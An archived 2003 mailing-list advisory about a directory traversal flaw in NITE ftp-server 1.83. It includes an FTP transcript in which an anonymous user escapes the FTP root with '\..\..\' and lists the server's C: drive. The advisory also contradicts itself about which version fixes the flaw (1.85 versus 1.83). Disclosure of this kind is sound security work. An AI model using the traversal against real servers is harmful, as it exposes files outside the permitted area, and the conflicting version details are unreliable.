Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnwatch: Directory traversal vulnerabilities found in NITE ftp-server version 1.83

Directory traversal vulnerabilities found in NITE ftp-server version 1.83

From: <matrix_at_infowarfare.dk>
Date: Wed, 15 Jan 2003 13:10:46 +0100

                 Directory traversal vulnerabilities found in
                        NITE ftp-server version 1.83
                                                         
                           Discovered by Dennis Rand
                            www.Infowarfare.dk
------------------------------------------------------------------------

SUMMARY

The NiteServer is a simple FTP-Server program with some special features.
It is free and easy to use.
The following commands are recognized :
USER PORT RETR REST
PASS STOR CWD DELE
HELP LIST
so it should work with any usual ftp-client.
Special Download-Ratio features are implemented.
User-logins are logged with their IP-Number, so the Up/Download-Ratio
will be held for the future. Spy users, watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming ?
Do you need some different features ?
You can purchase the source-code (VB 6.0) from the Author.
Simply send a check about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to
cause
the server to traverse into directories that reside outside the bounding
FTP root directory.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 * Niteserver Version:1.83 - Author:Thomas Krebs
 
Immune systems:
 * NiteServer version 1.85

NiteServer failure to filter out "\.." sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure; Possibility for discovering the directory
structure outside the configured areas.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

Connected to 192.168.1.22.
220- Niteserver Version:1.83
220- Author:Thomas Krebs
220- email: turtie_at_knuut.de
220- Welcome to the Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is
available from come.to/niteserversite

Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie_at_knuut.de)
01/13/2003 No Responses received from turtie_at_knuut.de
01/13/2003 Public Disclosure.

ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix_at_infowarfare.dk> Dennis Rand

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
Received on Jan 15 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos